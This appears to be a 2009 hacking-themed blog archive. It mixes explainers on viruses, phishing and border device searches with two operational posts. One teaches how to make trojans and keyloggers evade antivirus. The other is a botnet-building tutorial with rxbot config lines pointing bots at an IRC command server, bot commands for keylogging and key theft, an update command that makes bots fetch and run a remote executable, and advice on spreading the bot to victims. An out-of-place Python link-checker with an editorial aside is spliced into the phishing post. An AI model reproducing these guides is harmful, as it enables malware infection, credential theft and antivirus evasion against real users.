Tuesday, April 7, 2009

Drive-By Download Tutorial

A drive-by download is a program that is automatically downloaded to your computer without your consent or even your knowledge. Unlike a pop-up download, which asks for assent (albeit in a calculated manner likely to lead to a "yes"), a drive-by download can be initiated by simply visiting a Web site or viewing an HTML e-mail message. If your computer's security settings are lax, it may be possible for drive-by downloads to occur without any further action on your part.

Frequently, a drive-by download is installed along with a user-requested application. (In this case, the unwanted application is sometimes called a barnacle.) For example, a file sharing program might be included with a spyware program that tracks and reports user information for targeted marketing purposes. An associated adware program can then generate pop-up advertisements using that information.

Watch the video illustration here

Sunday, April 5, 2009

Can The Government Take Away My Laptop?

A woman stands in line at the airport, waiting to get through customs to return to the United States. She checks her BlackBerry for e-mail messages and shifts her computer briefcase to her other hand. Two uniformed men walk up to the traveler and ask her to step out of the line. They explain they're conducting a random search and that they need to look at her phone, her laptop and any other electronic devices she has. The woman asks when she can expect her property to be returned to her. The men in uniform tell her they can't be sure; they'll return the electronics when they're done searching.

According to the 9th Circuit Court in San Francisco, such a scenario is not only possible, it's completely legal. Federal Customs and Border Patrol agents have the right to confiscate and examine electronic devices belonging to anyone entering the United States. The agents aren't required to have probable cause before searching someone's devices. And they can look for any evidence of any crime at all.

This policy worries many international businesses that employ people who travel to and from the United States on a regular basis. It also might come as a shock to many U.S. residents. In most cases, citizens are guaranteed protection against unreasonable searches and seizures. Some people say that a policy in which a government agent could confiscate any electronic device for an indefinite length of time with no probable cause contradicts the Fourth Amendment of the U.S. Constitution. The 9th Circuit Court seems to feel otherwise.

U.S. Homeland Security officials claim that the policy is in place to protect the safety of the nation. They also claim that agents will not profile passengers or stop people based solely on their ethnic background or country of origin. But some critics say that in practice agents seem to target people from specific countries. An article in The Seattle Times suggests that government agents focus on Muslims and people from the Middle East or the southern parts of Asia more than others [source: Tu].

Border searches fall under the category of delicate issues -- proponents point out that an effective search might save millions of lives while critics say the potential for policy abuse is far too high to justify such an approach.

The Most Destructive Computer Viruses of All Time

Computer viruses can be a nightmare. Some can wipe out the information on a hard drive, tie up traffic on a computer network for hours, turn an innocent machine into a zombie and replicate and send themselves to other computers. If you've never had a machine fall victim to a computer virus, you may wonder what the fuss is about. But the concern is understandable -- according to Consumer Reports, computer viruses helped contribute to $8.5 billion in consumer losses in 2008 [source: MarketWatch]. Computer viruses are just one kind of online threat, but they're arguably the best known of the bunch.

In the good old days (i.e., the early 1980s), viruses depended on humans to do the hard work of spreading the virus to other computers. A hacker would save the virus to disks and then distribute the disks to other people. It wasn't until modems became common that virus transmission became a real problem. Today when we think of a computer virus, we usually imagine something that transmits itself via the Internet. It might infect computers through e-mail messages or corrupted Web links. Programs like these can spread much faster than the earliest computer viruses.

We're going to take a look at 10 of the worst computer viruses to cripple a computer system. Let's start with the Melissa virus.

Top 10: Melissa
In the spring of 1999, a man named David L. Smith created a computer virus based on a Microsoft Word macro. He built the virus so that it could spread through e-mail messages. Smith named the virus "Melissa," saying that he named it after an exotic dancer from Florida.

Rather than shaking its moneymaker, the Melissa computer virus tempts recipients into opening a document with an e-mail message like "Here is that document you asked for, don't show it to anybody else." Once activated, the virus replicates itself and sends itself out to the top 50 people in the recipient's e-mail address book.

The virus spread rapidly after Smith unleashed it on the world. The United States federal government became very interested in Smith's work -- according to statements made by FBI officials to Congress, the Melissa virus "wreaked havoc on government and private sector networks" [source: FBI]. The increase in e-mail traffic forced some companies to discontinue e-mail programs until the virus was contained.

Top 9: ILOVEYOU
The ILOVEYOU virus initially traveled the Internet by e-mail, just like the Melissa virus. The subject of the e-mail said that the message was a love letter from a secret admirer. An attachment in the e-mail was what caused all the trouble. The original worm had the file name of LOVE-LETTER-FOR-YOU.TXT.vbs. The vbs extension pointed to the language the hacker used to create the worm: Visual Basic Scripting [source: McAfee].

Who created the ILOVEYOU virus? Some think it was Onel de Guzman of the Philippines. Filipino authorities investigated de Guzman on charges of theft -- at the time the Philippines had no computer espionage or sabotage laws. Citing a lack of evidence, the Filipino authorities dropped the charges against de Guzman, who would neither confirm nor deny his responsibility for the virus. According to some estimates, the ILOVEYOU virus caused $10 billion in damages [source: Landler].

Top 8: The Klez Virus
The Klez virus marked a new direction for computer viruses, setting the bar high for those that would follow. It debuted in late 2001, and variations of the virus plagued the Internet for several months. The basic Klez worm infected a victim's computer through an e-mail message, replicated itself and then sent itself to people in the victim's address book. Some variations of the Klez virus carried other harmful programs that could render a victim's computer inoperable. Depending on the version, the Klez virus could act like a normal computer virus, a worm or a Trojan horse. It could even disable virus-scanning software and pose as a virus-removal tool [source: Symantec].

Top 7: Code Red
The Code Red and Code Red II worms popped up in the summer of 2001. Both worms exploited an operating system vulnerability that was found in machines running Windows 2000 and Windows NT. The vulnerability was a buffer overflow problem, which means when a machine running on these operating systems receives more information than its buffers can handle, it starts to overwrite adjacent memory.

Microsoft released software patches that addressed the security vulnerability in Windows 2000 and Windows NT. Once patched, the original worms could no longer infect a Windows 2000 machine; however, the patch didn't remove viruses from infected computers -- victims had to do that themselves.

Trojan Horse and Viruses Explained

Strange as it may sound, the computer virus is something of an Information Age marvel. On one hand, viruses show us how vulnerable we are -- a properly engineered virus can have a devastating effect, disrupting productivity and doing billions of dollars in damages. On the other hand, they show us how sophisticated and interconnected human beings have become.

For example, experts estimate that the Mydoom worm infected approximately a quarter-million computers in a single day in January 2004. Back in March 1999, the Melissa virus was so powerful that it forced Microsoft and a number of other very large companies to completely turn off their e-mail systems until the virus could be contained. The ILOVEYOU virus in 2000 had a similarly devastating effect. In January 2007, a worm called Storm appeared -- by October, experts believed up to 50 million computers were infected. That's pretty impressive when you consider that many viruses are incredibly simple.

When you listen to the news, you hear about many different forms of electronic infection. The most common are:

Viruses - A virus is a small piece of software that piggybacks on real programs. For example, a virus might attach itself to a program such as a spreadsheet program. Each time the spreadsheet program runs, the virus runs, too, and it has the chance to reproduce (by attaching to other programs) or wreak havoc.

E-mail viruses - An e-mail virus travels as an attachment to e-mail messages, and usually replicates itself by automatically mailing itself to dozens of people in the victim's e-mail address book. Some e-mail viruses don't even require a double-click -- they launch when you view the infected message in the preview pane of your e-mail software.

Trojan horses - A Trojan horse is simply a computer program. The program claims to do one thing (it may claim to be a game) but instead does damage when you run it (it may erase your hard disk). Trojan horses have no way to replicate automatically.

Worms - A worm is a small piece of software that uses computer networks and security holes to replicate itself. A copy of the worm scans the network for another machine that has a specific security hole. It copies itself to the new machine using the security hole, and then starts replicating from there, as well.

Monday, March 16, 2009

Simple Hacking: Phishing

In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites (YouTube, Facebook, MySpace, Windows Live Messenger), auction sites (eBay), online banks (Wells Fargo, Bank of America, Chase), online payment processors (PayPal), or IT Administrators (Yahoo, ISPs, corporate) are commonly used to lure the unsuspecting. Phishing is typically carried out by e-mail or instant messaging,[1] and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Even when using server authentication, it may require skill to detect that the website is fake. Phishing is an example of social engineering techniques used to fool users,[2] and exploits the poor usability of current web security technologies.[3] Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.

Common methods used:

Link manipulation - Most methods of phishing use some form of technical deception designed to make a link in an e-mail (and the spoofed website it leads to) appear to belong to the spoofed organization. Misspelled URLs or the use of subdomains are common tricks used by phishers. In the following example URL, http://www.yourbank.example.com/, it appears as though the URL will take you to the example section of the yourbank website; actually this URL points to the "yourbank" (i.e. phishing) section of the example website. Another common trick is to make the anchor text for the link appear to be valid, when the link actually goes to the phishers' site. The following example link, http://www.google.com/genuine/, appears to take you to an article entitled "Genuine"; clicking on it will in fact take you to the article entitled "Deception".

Filter evasion - Phishers have used images instead of text to make it harder for anti-phishing filters to detect text commonly used in phishing e-mails.

Website forgery - Once a victim visits the phishing website the deception is not over. Some phishing scams use JavaScript commands in order to alter the address bar. This is done either by placing a picture of a legitimate URL over the address bar, or by closing the original address bar and opening a new one with the legitimate URL. An attacker can even use flaws in a trusted website's own scripts against the victim. These types of attacks (known as cross-site scripting) are particularly problematic, because they direct the user to sign in at their bank or service's own web page, where everything from the web address to the security certificates appears correct. In reality, the link to the website is crafted to carry out the attack, although it is very difficult to spot without specialist knowledge. Just such a flaw was used in 2006 against PayPal.
A Universal Man-in-the-middle Phishing Kit, discovered by RSA Security, provides a simple-to-use interface that allows a phisher to convincingly reproduce websites and capture log-in details entered at the fake site.
To avoid anti-phishing techniques that scan websites for phishing-related text, phishers have begun to use Flash-based websites. These look much like the real website, but hide the text in a multimedia object.
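The two link-manipulation tricks described above (a brand name buried in a subdomain of an unrelated site, and anchor text that names a different domain than the href) can be checked mechanically. This is an added example, not code from the original post: it extracts the registrable domain from a URL's host and compares it with the domain the visible text suggests. The "last two labels" rule is a deliberate simplification that ignores public suffixes such as co.uk, and the phishing href in the usage is a constructed sample.

```python
from typing import List, Optional
from urllib.parse import urlsplit


def registrable_domain(url: str) -> str:
    """Return the domain that actually controls a URL's host.

    Everything left of the last two labels is a subdomain chosen by
    whoever owns that domain, so "www.yourbank.example.com" belongs to
    example.com, not to yourbank. Simplification (assumption for this
    example): public suffixes such as co.uk are not handled.
    """
    host = (urlsplit(url).hostname or "").lower().rstrip(".")
    labels = [label for label in host.split(".") if label]
    if len(labels) < 2:
        return host
    return ".".join(labels[-2:])


def looks_like_domain(text: str) -> Optional[str]:
    """If the anchor text itself looks like a URL or host, return its domain."""
    candidate = text.strip()
    if "://" not in candidate:
        candidate = "http://" + candidate
    try:
        domain = registrable_domain(candidate)
    except ValueError:
        return None
    # Plain words such as "Click here" yield no dotted host.
    return domain if "." in domain else None


def check_link(anchor_text: str, href: str,
               expected_brand: Optional[str] = None) -> List[str]:
    """Flag the deceptions described in the post. Returns a list of findings:

      'subdomain-disguise'  - the brand appears in the host only as a
                              subdomain of an unrelated registrable domain
      'text-href-mismatch'  - anchor text names one domain, href another
    An empty list means nothing looked wrong.
    """
    findings: List[str] = []
    actual = registrable_domain(href)
    host = (urlsplit(href).hostname or "").lower()
    if expected_brand:
        brand = expected_brand.lower()
        if brand in host and brand not in actual:
            findings.append("subdomain-disguise")
    shown = looks_like_domain(anchor_text)
    if shown and shown != actual:
        findings.append("text-href-mismatch")
    return findings


if __name__ == "__main__":
    # The post's first example: yourbank is only a subdomain of example.com.
    print(check_link("yourbank.example.com",
                     "http://www.yourbank.example.com/", "yourbank"))
    # The post's second example with a constructed phishing href.
    print(check_link("http://www.google.com/genuine/",
                     "http://phish.example.net/deception"))
```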

Want to learn how to do simple phishing?
Watch this video: http://www.youtube.com/watch?v=_EajDbwNP4s&feature=related

Friday, March 13, 2009

How to make rBot, trojans, keyloggerz and viruses Undetectable

1. Encryptors/Compressors: You would think this should be the easiest way to UD (Undetect) a Trojan... but alas, it is not. The problem is simply this: most people use the same Trojans and Packers so often that Anti-Virus software knows pretty much all the signatures. For Trojans they use Ardamax Keylogger, Optix Pro, Beast, ProRat etc. For Packers they use UPX, PECompress, AsPack, Morphine etc. Again, none of these combinations work because all the signatures have been flagged. The best way this option will work is to find lesser known Packers and Trojans to work with. Try a Google search for Executable Packers. Get a few that you have not heard of before or that have a decent rating. If it is not freeware, I am sure there will be a Crack for it. For Trojans, three good resources are VXChaos, LeetUpload or VX Heaven. Remember to pick the ones that are not well known and try to mix and match those Trojans and Packers.

2. Byte Adders: This technique allows you to add junk bytes to your Trojan so as to confuse Anti-Virus software. It does this by moving the code around inside the executable as the bytes are being added. This means that the signature will not be in the place the Anti-Virus expects it to be. A good tool for this would be StealthTools v2.0 by Gobo.

3. Hex Editing: This is much more complicated and takes a lot more practice to get right. The idea here is to find the signature that Anti-Virus software has flagged inside of your Trojan and change it by adding a different byte, or changing the Offset to one of its other equivalents. The three things you will need here are a File Splitter, a Hex Editor and an Anti-Virus Offset Finder. The File Splitter will cut your executable into smaller files (preferably 1 byte per file). You then use your Hex Editor on the file that holds the signature and change that signature. Or, you can keep the file complete and use your AV Offset Finder to find the Offsets automatically and just change the signatures found with your Hex Editor.

Step One: Place your Trojan Server in a folder.
Step Two: Split your Server with your File Splitter into 1 byte per file. This may make a lot of files in your folder (depending on how large the Server is), but it is worth it because you will know that only one or two of those files has the signature that is flagged and all the rest are clean.
Step Three: Scan your folder with your Anti-Virus software and make note of which files it says are infected. Those will be the ones you edit.
Step Four: Open up each infected file with your Hex Editor and change the Offset. There is no fool proof way of doing this, you will have to experiment. Since this will be a 1 byte file, there will not be much you need to change. Just change one character or byte at a time and then save your progress. Re-scan to see if it worked. If it did not, go back and try again.
Step Five: Once you feel that you have found all signatures and changed them, rejoin your files with your File Splitter and test your Server to see if it works. Remember that too much Editing will make your Server useless so be careful.
(Optional) Step Six: Another good way is to use an Anti-Virus Offset Finder that will find the correct Offset automatically so you do not have to search for them or split your Server. Get AV Devil 2.1 to find the Offsets (password is: to0l-base).
You have to remember that different AV software use different signatures, so scan with as many as you can.

4. Source: The very best way to make an undetectable Trojan has always been to make your own. I know it may seem like a daunting task to do, but it could be simpler than you think. Here I will give a few options on how to do this. The reason why you would want to make your own Trojan is the fact that each time it is compiled, it is given a new signature. Changing just a single string in the Source code can make it undetectable.

Option 1: Free Trojan Source Code. Finding free Trojan source code is not hard. Again, going to places like VXChaos or Planet Source Code can yield a plethora of really good and lesser known Trojan code. Pick what Programming Language you like and look for examples. Not much needs to be changed to make these undetectable. A simple recompile will sometimes do the trick.

Option 2: Decompiling. Some may call this "Stealing" source code. I like to call it "Borrowing". The first thing you need to know is what language your Trojan is in. Let's say your Trojan was Optix Pro; your programming language would be Delphi. A good Delphi Decompiler would be DeDe. Decompile Optix Pro with DeDe then recompile it with a Delphi compiler and voila! Just change a few strings around within the source and you should have an undetectable Optix Pro. Another way would be to open your Trojan with a Debugger or Disassembler. Copy down the ASM code and then recompile it in an ASM compiler. That may be a bit more tricky, but the idea is the same. Try to convert the executable into pure ASM as best you can. There are many free Debuggers/Disassemblers, Google for them.

Friday, March 6, 2009

How to build a botnet (revised)

There are many tutorials around but I thought I would post one to help people. In addition to Rxbot 7.6 modded in this tutorial, you can also use another good source. It is rx-asn-2-re-worked v3, a stable mod of rxbot, and it is 100% functional and not crippled. If you want to download it, you can below:
http://rapidshare.com/files/206237223/rbot_7.6_source_code.zip.html
Compiling is the same as it would be with Rxbot 7.6. I prefer this source but it would ultimately be best to compile your own bot/get a private one.

Q: What is a botnet?
A: A botnet is where you send a trojan to someone and when they open it a "bot" joins your channel on IRC (secretly, they don't know this). Once done the computer is now referred to as a "zombie". Depending on the source you used, the bot can do several things. But once again depending on the source you can: keylog their computer, take pictures of their screen, turn on their webcam and take pics/movies, harvest cdkeys and game keys or even cracks, passwords, aim screen names, emails; you can also spam, flood, DDoS, ping, packet, yada yada; some have built in md5 crackers, and clone functions to spam other irc channels and overrun a channel and even perform IRC "Takeovers". Once again depending on the bot it may be able to kill other fellow competitor bots. Or even kill AV/FW upon startup. Add itself to registry. Open sites. Open commands. Cmd, notepad, html, anything is possible! There's the infected computers "bots", the attacker, the server, and the victim.

Quote: While the term "botnet" can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka "bot herder") can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs manifest as IRC "bots". Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community.

Quote: Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out "low profile DDoS attacks" and steal the CD keys for games, he explained. "They had a huge weapon and didn't use as much as they could have done," Santorelli told El Reg. "The main damage caused in the case is down to the cost of cleaning up infected PCs."

Quote: Botnets are being used for Google Adword click fraud, according to security watchers.

Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on irc on a public server but I would recommend a private, password protected server.
---------------
Ignore anything about using the server editor, but this tutorial shows how to make the trojan undetectable and spread bots:
http://rapidshare.com/files/206234923/packer_installer.exe.html

Here we go ladies and gentlemen. Follow the tutorial:

I. Setting up the C++ compiler: (easy)
1. Download: http://www.megaupload.com/?d=SUHPYZRX (Pass: itzforblitz, Serial: 812-2224558)
2. Run setup.exe and install. Remember to input the serial.
3. Download and install the Service Pack 6 (60.8 mb): http://www.microsoft.com/downloads/d...displaylang=en
After that download and install: Windows SDK (1.2 mb): http://www.megaupload.com/?d=YH3SS78I (Pass: itzforblitz)

II. Configuring the C++ compiler (easy)
1. Open up Microsoft Visual C++ Compiler 6.0
2. Go to Tools > Options and click the "Directories" tab
3. Now, browse to these directories and add them to the list: (Click the dotted box to add)
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\LIB
4. Now put them in this order: (use up and down arrows) (it does not matter what's below those lines)

III. Configuring your bot: (easy)
1. Download and unpack: Rxbot 7.6 (212.3 kb) http://rapidshare.com/files/21854222...7.6rx.rar.html
2. You should see an Rxbot 7.6 folder
3. Open Rxbot 7.6 > configs.h and edit these lines only (put the values in quotations):
char password[] = "Bot_login_pass"; // bot password (Ex: monkey)
char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)
char serverpass[] = ""; // server password (not usually needed)
char channel[] = "#botz_channel"; // channel that the bot should join
char chanpass[] = "My_channel_pass"; // channel password
Optional:
char server2[] = ""; // backup server
char channel2[] = ""; // backup channel
char chanpass2[] = ""; // backup channel pass

IV. Building your bot: (very easy)
1. Make sure Microsoft Visual C++ is open
2. Select "File > Open Workspace"
3. Browse to your Rxbot 7.6 folder and open the rBot.dsw file
4. Right click "rBot Files" and click Build
5. rBot.exe will be in the Rxbot 7.6 > Debug folder

!!! YOU'RE DONE !!!! Now get the rbot and pack it (use the tool in the third post: open rbot and click "Protect") and send it to some idiots. Follow the tutorial on top to learn how to spread. Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways. ENJOY!

Command list
Download Command list: http://rapidshare.com/files/21542921/cmands.html
Basics:
.login botpassword will login bots
.logout will logout bots
.keylog on will turn keylogger on
.getcdkeys will retrieve cdkeys
Read the command list for more.

Download mIRC: http://dw.com.com/redir?edId=3&siteI...part%3Ddl-mIRC

How to secure your bots:
Don't be an arse, it is easy to steal bots. All you need is the irc server address and maybe a key. To steal bots, watch for the @login key; one must upload their bot to a direct link (tdotnetwork is excellent) and update the channel topic and run:
@update http://www.mybot.com/download/SMSPRO.exe 82
The http://mybot.com is your bot's download link and the 82 can be any number(s). Now steal their bots and have them join your channel. To find the server address you need their botnet. Then take their bot and open it in the server editor. Address will be shown and so will password and other needed information.

To secure yourself: It is fairly easy to secure your bots, here is how:
1. When you are in your channel, right click on your chat window and select "Channel Modes"
2. Make sure these options are checked:
This way no one besides you or another op can set the channel topic.
Note: Setting "Moderated" is good for when you are not there because anyone who is not voiced (+v) or an op (+o) cannot talk. They will still log in and follow commands, however there will be no output.

Sunday, March 1, 2009

Welcome to my blog

I'm a novice in blogging. Please forgive me for the unnecessary mistakes I will be making in the future.